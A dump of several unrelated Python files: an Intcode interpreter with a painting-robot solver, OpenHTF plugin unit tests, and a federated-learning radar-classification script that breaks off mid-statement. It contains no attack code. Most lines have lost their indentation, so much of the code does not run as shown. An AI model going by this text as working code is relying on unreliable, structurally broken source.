worker_proc = subprocess.Popen(cmd.split(), universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
flush(worker_proc, worker_log)
|
day11-2.py
|
import queue
import threading
class Intcode:
    def __init__(self, instructions, inputBuffer=None, outputBuffer=None):
        # avoid shared mutable default arguments: create fresh queues per instance
        self.instructions = instructions
        self.inputBuffer = inputBuffer if inputBuffer is not None else queue.Queue()
        self.outputBuffer = outputBuffer if outputBuffer is not None else queue.Queue()
        self.relativeBase = 0
        self.instructions.extend([-1 for i in range(2 ** 20 - len(self.instructions))])
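    # Dispatch a single instruction: the opcode is the low two digits of the
    # value at `index`, and the remaining digits encode the parameter modes
    # (0 = position, 1 = immediate, 2 = relative to relativeBase).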
def interpreter(self, index):
instruction = self.instructions[index] % 100
mode = int(self.instructions[index] / 100)
if instruction == 99:
return -1
elif instruction == 1: # add
return self.add(index, mode)
elif instruction == 2: # multiply
return self.multiply(index, mode)
elif instruction == 3: # read and store
return self.readAndStore(index, mode)
elif instruction == 4: # return value
return self.returnVal(index, mode)
elif instruction == 5: # jump-if-true
return self.jumpIfTrue(index, mode)
elif instruction == 6: # jump-if-false
return self.jumpIfFalse(index, mode)
elif instruction == 7: # less than
            return self.lessThan(index, mode)
elif instruction == 8: # equals
return self.equals(index, mode)
elif instruction == 9: # adjust relative base
return self.adjustRelativeBase(index, mode)
def start(self):
t = threading.Thread(target=self.runProgram, args=())
t.start()
return t
def runProgram(self):
index = 0
while index != -1:
index = self.interpreter(index)
# instructions code
def add(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = arg1 + arg2
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = arg1 + arg2
return index + 4
def multiply(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = arg1 * arg2
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = arg1 * arg2
return index + 4
def readAndStore(self, index, mode):
if mode % 10 == 0:
self.instructions[self.instructions[index + 1]] = self.inputBuffer.get(True)
elif mode % 10 == 2:
self.instructions[self.instructions[index + 1] + self.relativeBase] = self.inputBuffer.get(True)
return index + 2
def returnVal(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
self.outputBuffer.put(arg1)
return index + 2
def jumpIfTrue(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 != 0:
return arg2
else:
return index + 3
def jumpIfFalse(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 == 0:
return arg2
else:
return index + 3
    def lessThan(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 < arg2:
res = 1
else:
res = 0
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = res
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = res
return index + 4
def equals(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
mode = int(mode / 10)
if mode % 10 == 0:
arg2 = self.instructions[self.instructions[index + 2]]
elif mode % 10 == 1:
arg2 = self.instructions[index + 2]
elif mode % 10 == 2:
arg2 = self.instructions[self.instructions[index + 2] + self.relativeBase]
if arg1 == arg2:
res = 1
else:
res = 0
mode = int(mode / 10)
if mode % 10 == 0:
self.instructions[self.instructions[index + 3]] = res
elif mode % 10 == 2:
self.instructions[self.instructions[index + 3] + self.relativeBase] = res
return index + 4
def adjustRelativeBase(self, index, mode):
if mode % 10 == 0:
arg1 = self.instructions[self.instructions[index + 1]]
elif mode % 10 == 1:
arg1 = self.instructions[index + 1]
elif mode % 10 == 2:
arg1 = self.instructions[self.instructions[index + 1] + self.relativeBase]
self.relativeBase += arg1
return index + 2
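# Painting-robot driver: feed the current panel colour to the Intcode program,
# read back the colour to paint and a turn instruction (1 turns one way, 0 the
# other), step to the next panel, and repeat until the program halts; the
# painted panels are then rendered as '#' characters.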
with open("input.txt") as f:
data = f.read()
instructions = list(map(int, data.split(",")))
painter = Intcode(instructions)
ioin = painter.inputBuffer
ioout = painter.outputBuffer
orientation = 0
canvas = {}
t = painter.start()
position = (0, 0)
ioin.put(1)
color = ioout.get()
canvas[position] = color
direction = ioout.get()
if direction == 1:
orientation += 1
elif direction == 0:
orientation -= 1
orientation = orientation % 4
if orientation == 0:
position = (position[0] + 1, position[1])
elif orientation == 1:
position = (position[0], position[1] + 1)
elif orientation == 2:
position = (position[0] - 1, position[1])
elif orientation == 3:
position = (position[0], position[1] - 1)
while t.is_alive():
if position in canvas.keys():
oldColor = canvas[position]
else:
oldColor = 0
ioin.put(oldColor)
color = ioout.get()
canvas[position] = color
direction = ioout.get()
if direction == 1:
orientation += 1
elif direction == 0:
orientation -= 1
orientation = orientation % 4
if orientation == 0:
position = (position[0] + 1, position[1])
elif orientation == 1:
position = (position[0], position[1] + 1)
elif orientation == 2:
position = (position[0] - 1, position[1])
elif orientation == 3:
position = (position[0], position[1] - 1)
for i in reversed(range(min(canvas.keys(), key=lambda x: x[0])[0], 1)):
for j in range(max(canvas.keys(), key=lambda x: abs(x[1]))[1] + 1):
if (i, j) in canvas.keys():
char = canvas[(i, j)]
# print(canvas[(i,j)],end=" ")
else:
# print(" ",end=" ")
char = 0
if char == 1:
print("#", end="")
else:
print(" ", end="")
print()
|
plugs_test.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import mock
import openhtf
from openhtf import plugs
from openhtf.util import test
class AdderPlug(plugs.FrontendAwareBasePlug):
INSTANCE_COUNT = 0
LAST_INSTANCE = None
def __init__(self):
super(AdderPlug, self).__init__()
type(self).INSTANCE_COUNT += 1
type(self).LAST_INSTANCE = self
self.state = 'CREATED'
self.number = 0
def _asdict(self):
return {'number': self.number}
def increment(self):
self.number += 1
self.notify_update()
return self.number
def tearDown(self):
self.state = 'TORN DOWN'
class AdderSubclassPlug(AdderPlug):
pass
class DummyPlug(plugs.BasePlug):
pass
class TearDownRaisesPlug1(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class TearDownRaisesPlug2(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class PlugsTest(test.TestCase):
def setUp(self):
self.plug_manager = plugs.PlugManager(
{AdderPlug}, record_logger_name='mock.logger.for.openhtf')
AdderPlug.INSTANCE_COUNT = 0
def tearDown(self):
self.plug_manager.tear_down_plugs()
def test_base_plug(self):
plug = plugs.BasePlug()
self.assertEqual({}, plug._asdict())
plug.tearDown()
def test_initialize(self):
self.assertEqual(0, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs({AdderPlug})
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(
AdderPlug.LAST_INSTANCE,
self.plug_manager.provide_plugs(
(('adder_plug', AdderPlug),))['adder_plug'])
self.assertEqual(self.plug_manager._asdict()['plug_descriptors'], {
'plugs_test.AdderPlug': {'mro': ['plugs_test.AdderPlug']},
})
self.assertEqual(self.plug_manager._asdict()['plug_states'], {
'plugs_test.AdderPlug': {'number': 0},
})
self.assertEqual('CREATED', AdderPlug.LAST_INSTANCE.state)
@test.yields_phases
def test_multiple_plugs(self):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(other_plug=AdderPlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
self.assertIs(AdderPlug.LAST_INSTANCE, other_plug)
yield dummy_phase
@plugs.plug(adder_plug=AdderPlug,
other_plug=plugs.BasePlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
yield dummy_phase
@test.yields_phases
def test_plug_logging(self):
"""Test that both __init__ and other functions get the good logger."""
class LoggingPlug(plugs.BasePlug):
def __init__(self):
self.logger_seen_init = self.logger
def action(self):
self.logger_seen_action = self.logger
@plugs.plug(logger=LoggingPlug)
def dummy_phase(test_api, logger):
logger.action()
self.assertIs(logger.logger_seen_init, logger.logger_seen_action)
self.assertIs(logger.logger_seen_init, self.logger)
yield dummy_phase
def test_tear_down_raises(self):
"""Test that all plugs get torn down even if some raise."""
self.plug_manager.initialize_plugs({
TearDownRaisesPlug1, TearDownRaisesPlug2})
self.plug_manager.tear_down_plugs()
self.assertTrue(TearDownRaisesPlug1.TORN_DOWN)
self.assertTrue(TearDownRaisesPlug2.TORN_DOWN)
def test_plug_updates(self):
self.plug_manager.initialize_plugs({AdderPlug})
update = self.plug_manager.wait_for_plug_update(
'plugs_test.AdderPlug', {}, .001)
self.assertEqual({'number': 0}, update)
# No update since last time, this should time out (return None).
self.assertIsNone(self.plug_manager.wait_for_plug_update(
'plugs_test.AdderPlug', update, .001))
def _delay_then_update():
time.sleep(.5)
self.assertEqual(1, AdderPlug.LAST_INSTANCE.increment())
threading.Thread(target=_delay_then_update).start()
start_time = time.time()
self.assertEqual({'number': 1}, self.plug_manager.wait_for_plug_update(
'plugs_test.AdderPlug', update, 5))
self.assertGreater(time.time() - start_time, .2)
def test_invalid_plug(self):
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({object})
with self.assertRaises(plugs.InvalidPlugError):
plugs.plug(adder_plug=object)
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({
type('BadPlug', (plugs.BasePlug,), {'logger': None})})
with self.assertRaises(plugs.InvalidPlugError):
class BadPlugInit(plugs.BasePlug):
def __init__(self):
self.logger = None
self.plug_manager.initialize_plugs({BadPlugInit})
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.wait_for_plug_update('invalid', {}, 0)
def test_duplicate_plug(self):
with self.assertRaises(plugs.DuplicatePlugError):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(adder_plug=AdderPlug)
def dummy_phase(test, adder_plug):
pass
def test_uses_base_tear_down(self):
self.assertTrue(plugs.BasePlug().uses_base_tear_down())
self.assertTrue(DummyPlug().uses_base_tear_down())
self.assertFalse(AdderPlug().uses_base_tear_down())
self.assertFalse(AdderSubclassPlug().uses_base_tear_down())
self.assertFalse(TearDownRaisesPlug1().uses_base_tear_down())
|
federated_learning_keras_consensus_FL_sidelink.py
|
from DataSets import RadarData
from DataSets_tasks import RadarData_tasks
from consensus.consensus_v4 import CFA_process
from consensus.parameter_server_v2 import Parameter_Server
# use only for consensus; PS only for energy efficiency
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=0, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=1, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.00025, help="sets the learning rate for all setups", type=float)
parser.add_argument('-eps', default=1, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-target', default=0.1, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=4, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-Ka_consensus', default=4, help="sets the number of active devices for consensus", type=int)
parser.add_argument('-samp', default=15, help="sets the number samples per device", type=int)
parser.add_argument('-noniid_assignment', default=0, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=3, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=5, help="sets the batch size per learning round", type=int)
parser.add_argument('-input_data', default='data_mimoradar/data_mmwave_900.mat', help="sets the path to the federated dataset", type=str)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for the default graph, >0 selects one of the adjacency matrices stored in vGraph.mat", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
max_epochs = 400
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
################# consensus, create the scheduling function ################
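# scheduling_tx[d, k] == 1 marks device d as active in round k; each round a
# sliding window of Ka (PS/FedAvg) or Ka_consensus (CFA) consecutive device
# indices is activated, and indexes_tx records those active indices per round.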
scheduling_tx = np.zeros((devices, max_epochs*2), dtype=int)
if parameter_server and not federated:
indexes_tx = np.zeros((args.Ka, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka, replace=False)
sr = devices - args.Ka + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:,k] = inds
elif not parameter_server and federated:
indexes_tx = np.zeros((args.Ka_consensus, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka_consensus, replace=False)
sr = devices - args.Ka_consensus + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka_consensus + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:, k] = inds
###########################################################################
if active_devices_per_round > devices:
active_devices_per_round = devices
filepath = args.input_data
target_loss = args.target
# Configuration parameters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
validation_train = 900 # VALIDATION and training DATASET size
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
# number_of_batches = args.batches
number_of_batches_for_validation = int(validation_train/batch_size)
print("Number of batches for learning {}".format(number_of_batches))
max_lag = 1 # consensus max delay (e.g. 2 = 2 epochs max)
refresh_server = 1 # refresh server updates (in sec)
n_outputs = 6 # 6 classes
validation_start = 1 # start validation in epochs
# Using huber loss for stability
# loss_function = keras.losses.Huber()
# Using crossentropy
loss_function = tf.keras.losses.CategoricalCrossentropy(
from_logits=False,
label_smoothing=0,
reduction="auto",
name="categorical_crossentropy",
)
# save scheduling format
# dict_0 = {"scheduling": scheduling_tx, "devices_scheduling": indexes_tx}
# sio.savemat("results/matlab/CFA_scheduling_devices_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}.mat".format(devices, args.N, number_of_batches, batch_size, args.noniid_assignment, args.run), dict_0)
# def get_noniid_data(total_training_size, devices, batch_size):
# samples = np.random.random_integers(batch_size, total_training_size - batch_size * (devices - 1),
# devices) # create random numbers
# samples = samples / np.sum(samples, axis=0) * total_training_size # force them to sum to totals
# # Ignore the following if you don't need integers
# samples = np.round(samples) # transform them into integers
# remainings = total_training_size - np.sum(samples, axis=0) # check if there are corrections to be done
# step = 1 if remainings > 0 else -1
# while remainings != 0:
# i = np.random.randint(devices)
# if samples[i] + step >= 0:
# samples[i] += step
# remainings -= step
# return samples
####
def preprocess_observation(obs, batch_size):
    img = obs.astype(float)  # cast to float
    return img.reshape(batch_size, 256, 63, 1)
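# Small CNN classifier used by every device: three conv layers, a dense layer,
# and a softmax over the n_outputs classes.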
def create_q_model():
# Network defined by the Deepmind paper
inputs = layers.Input(shape=(256, 63, 1,))
# Convolutions
layer1 = layers.Conv2D(32, 8, strides=4, activation="relu")(inputs)
layer2 = layers.Conv2D(64, 4, strides=2, activation="relu")(layer1)
layer3 = layers.Conv2D(64, 3, strides=1, activation="relu")(layer2)
layer4 = layers.Flatten()(layer3)
layer5 = layers.Dense(512, activation="relu")(layer4)
classification = layers.Dense(n_outputs, activation="softmax")(layer5)
return keras.Model(inputs=inputs, outputs=classification)
def processParameterServer(devices, active_devices_per_round, federated, refresh_server=1):
model_global = create_q_model()
model_parameters_initial = np.asarray(model_global.get_weights())
parameter_server = Parameter_Server(devices, model_parameters_initial, active_devices_per_round, indexes_tx)
global_target_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
epoch_count = 0
np.save(global_target_model, model_parameters_initial)
np.save(global_epoch, epoch_count)
pause(2) # wait for neighbors
while True:
pause(refresh_server) # refresh global model on every xx seconds
fileList = glob.glob('*.mat', recursive=False)
if len(fileList) == devices:
# stop the server
break
else:
np.save(global_target_model, parameter_server.federated_target_weights_aggregation(epoch_count, aggregation_type=0))
epoch_count += 1
np.save(global_epoch, epoch_count)
# execute for each deployed device
def processData(device_index, start_samples, samples, federated, full_data_size, number_of_batches, parameter_server, sample_distribution):
pause(5) # PS server (if any) starts first
checkpointpath1 = 'results/model{}.h5'.format(device_index)
outfile = 'results/dump_train_variables{}.npz'.format(device_index)
outfile_models = 'results/dump_train_model{}.npy'.format(device_index)
global_model = 'results/model_global.npy'
global_epoch = 'results/epoch_global.npy'
# np.random.seed(1)
# tf.random.set_seed(1) # common initialization
learning_rate = args.mu
learning_rate_local = learning_rate
B = np.ones((devices, devices)) - tf.one_hot(np.arange(devices), devices)
Probabilities = B[device_index, :]/(devices - 1)
training_signal = False
# check for backup variables on start
if os.path.isfile(checkpointpath1):
train_start = False
# backup the model and the model target
model = models.load_model(checkpointpath1)
data_history = []
label_history = []
local_model_parameters = np.load(outfile_models, allow_pickle=True)
model.set_weights(local_model_parameters.tolist())
dump_vars = np.load(outfile, allow_pickle=True)
frame_count = dump_vars['frame_count']
epoch_loss_history = dump_vars['epoch_loss_history'].tolist()
running_loss = np.mean(epoch_loss_history[-5:])
epoch_count = dump_vars['epoch_count']
else:
train_start = True
model = create_q_model()
data_history = []
label_history = []
frame_count = 0
# Experience replay buffers
epoch_loss_history = []
epoch_count = 0
running_loss = math.inf
if parameter_server:
epoch_global = 0
training_end = False
a = model.get_weights()
# set an arbitrary optimizer, here Adam is used
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# create a data object (here radar data)
#start = time.time()
if args.noniid_assignment == 1:
data_handle = RadarData_tasks(filepath, device_index, start_samples, samples, full_data_size)
else:
data_handle = RadarData(filepath, device_index, start_samples, samples, full_data_size,
args.random_data_distribution)
#end = time.time()
#time_count = (end - start)
#print(time_count)
# create a consensus object
cfa_consensus = CFA_process(devices, device_index, args.N)
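    # Main loop: collect one batch per iteration; every `number_of_batches`
    # batches run a local training pass, then either average weights with a
    # neighbour (consensus/CFA) or pull the global model from the parameter
    # server, and periodically validate against the held-out set.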
while True: # Run until solved
# collect 1 batch
frame_count += 1
obs, labels = data_handle.getTrainingData(batch_size)
data_batch = preprocess_observation(obs, batch_size)
# Save data and labels in the current learning session
data_history.append(data_batch)
label_history.append(labels)
if frame_count % number_of_batches == 0:
if not parameter_server:
epoch_count += 1
# check scheduling for federated
if federated:
if epoch_count == 1 or scheduling_tx[device_index, epoch_count] == 1:
training_signal = False
else:
# stop all computing, just save the previous model
training_signal = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# check scheduling for parameter server
if parameter_server:
while not os.path.isfile(global_epoch):
# implementing consensus
print("waiting")
pause(1)
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
pause(5)
print("retrying opening global epoch counter")
try:
epoch_global = np.load(global_epoch, allow_pickle=True)
except:
print("failed reading global epoch")
if epoch_global == 0:
training_signal = False
elif scheduling_tx[device_index, epoch_global] == 1:
if epoch_global > epoch_count:
epoch_count = epoch_global
training_signal = False
else:
training_signal = True
else:
# stop all computing, just save the previous model
training_signal = True
# always refresh the local model using the PS one
stop_aggregation = False
while not os.path.isfile(global_model):
# implementing consensus
print("waiting")
pause(1)
try:
model_global = np.load(global_model, allow_pickle=True)
except:
pause(5)
print("retrying opening global model")
try:
model_global = np.load(global_model, allow_pickle=True)
except:
print("halting aggregation")
stop_aggregation = True
if not stop_aggregation:
model.set_weights(model_global.tolist())
if training_signal:
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
        # check scheduling for parameter server
# Local learning update every "number of batches" batches
time_count = 0
if frame_count % number_of_batches == 0 and not training_signal:
# run local batches
for i in range(number_of_batches):
start = time.time()
data_sample = np.array(data_history[i])
label_sample = np.array(label_history[i])
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
with tf.GradientTape() as tape:
# Train the model on data samples
classes = model(data_sample, training=False)
# Apply the masks
# for k in range(batch_size):
# class_v[k] = tf.argmax(classes[k])
# class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# Take best action
# Calculate loss
loss = loss_function(masks, classes)
# Backpropagation
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
end = time.time()
time_count = time_count + (end-start)/number_of_batches
if not parameter_server and not federated:
print('Average batch training time {:.2f}'.format(time_count))
del data_history
del label_history
data_history = []
label_history = []
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
# Consensus round
# update local model
cfa_consensus.update_local_model(model_weights)
# neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
np.random.seed(1)
tf.random.set_seed(1) # common initialization
if not train_start:
if federated and not training_signal:
eps_c = 1 / (args.N + 1)
# apply consensus for model parameter
# neighbor = np.random.choice(np.arange(devices), args.N, p=Probabilities, replace=False) # choose neighbor
# neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N, replace=False) # choose neighbor
neighbor = cfa_consensus.get_connectivity(device_index, args.N, devices) # fixed neighbor
while neighbor == device_index:
neighbor = np.random.choice(indexes_tx[:, epoch_count - 1], args.N,
replace=False) # choose neighbor
print("Consensus from neighbor {} for device {}, local loss {:.2f}".format(neighbor, device_index,
loss.numpy()))
model.set_weights(cfa_consensus.federated_weights_computing(neighbor, args.N, epoch_count, eps_c, max_lag))
if cfa_consensus.getTrainingStatusFromNeightbor():
# a neighbor completed the training, with loss < target, transfer learning is thus applied (the device will copy and reuse the same model)
training_signal = True # stop local learning, just do validation
else:
print("Consensus warm up")
train_start = False
# check if parameter server is enabled
# stop_aggregation = False
# if parameter_server:
# # pause(refresh_server)
# while not os.path.isfile(global_model):
# # implementing consensus
# print("waiting")
# pause(1)
# try:
# model_global = np.load(global_model, allow_pickle=True)
# except:
# pause(5)
# print("retrying opening global model")
# try:
# model_global = np.load(global_model, allow_pickle=True)
# except:
# print("halting aggregation")
# stop_aggregation = True
#
# if not stop_aggregation:
# # print("updating from global model inside the parmeter server")
# for k in range(cfa_consensus.layers):
# # model_weights[k] = model_weights[k]+ 0.5*(model_global[k]-model_weights[k])
# model_weights[k] = model_global[k]
# model.set_weights(model_weights.tolist())
#
# while not os.path.isfile(global_epoch):
# # implementing consensus
# print("waiting")
# pause(1)
# try:
# epoch_global = np.load(global_epoch, allow_pickle=True)
# except:
# pause(5)
# print("retrying opening global epoch counter")
# try:
# epoch_global = np.load(global_epoch, allow_pickle=True)
# except:
# print("halting aggregation")
del model_weights
#start = time.time()
# validation tool for device 'device_index'
if epoch_count > validation_start and frame_count % number_of_batches == 0:
avg_cost = 0.
for i in range(number_of_batches_for_validation):
obs_valid, labels_valid = data_handle.getTestData(batch_size, i)
# obs_valid, labels_valid = data_handle.getRandomTestData(batch_size)
data_valid = preprocess_observation(np.squeeze(obs_valid), batch_size)
data_sample = np.array(data_valid)
label_sample = np.array(labels_valid)
# Create a mask to calculate loss
masks = tf.one_hot(label_sample, n_outputs)
classes = model(data_sample, training=False)
# Apply the masks
# class_v = tf.reduce_sum(tf.multiply(classes, masks), axis=1)
# class_v = np.zeros(batch_size, dtype=int)
# for k in range(batch_size):
# class_v[k] = tf.argmax(classes[k]).numpy()
# Calculate loss
# loss = loss_function(label_sample, classes)
loss = loss_function(masks, classes).numpy()
avg_cost += loss / number_of_batches_for_validation # Training loss
epoch_loss_history.append(avg_cost)
print("Device {} epoch count {}, validation loss {:.2f}".format(device_index, epoch_count,
avg_cost))
# mean loss for last 5 epochs
running_loss = np.mean(epoch_loss_history[-1:])
#end = time.time()
#time_count = (end - start)
#print(time_count)
if running_loss < target_loss: # Condition to consider the task solved
print("Solved for device {} at epoch {} with average loss {:.2f} !".format(device_index, epoch_count, running_loss))
training_end = True
model_weights = np.asarray(model.get_weights())
model.save(checkpointpath1, include_optimizer=True, save_format='h5')
# model_target.save(checkpointpath2, include_optimizer=True, save_format='h5')
np.savez(outfile, frame_count=frame_count, epoch_loss_history=epoch_loss_history,
training_end=training_end, epoch_count=epoch_count, loss=running_loss)
np.save(outfile_models, model_weights)
if federated:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices, "neighbors": args.N,
"active_devices": args.Ka_consensus,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples, "noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
elif parameter_server:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"active_devices": active_devices_per_round,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
else:
dict_1 = {"epoch_loss_history": epoch_loss_history, "federated": federated,
"parameter_server": parameter_server, "devices": devices,
"batches": number_of_batches, "batch_size": batch_size, "samples": samples,
"noniid": args.noniid_assignment, "data_distribution": args.random_data_distribution}
if federated:
sio.savemat(
"results/matlab/CFAS_device_{}_samples_{}_devices_{}_active_{}_neighbors_{}_batches_{}_size{}_noniid{}_run{}_distribution{}.mat".format(
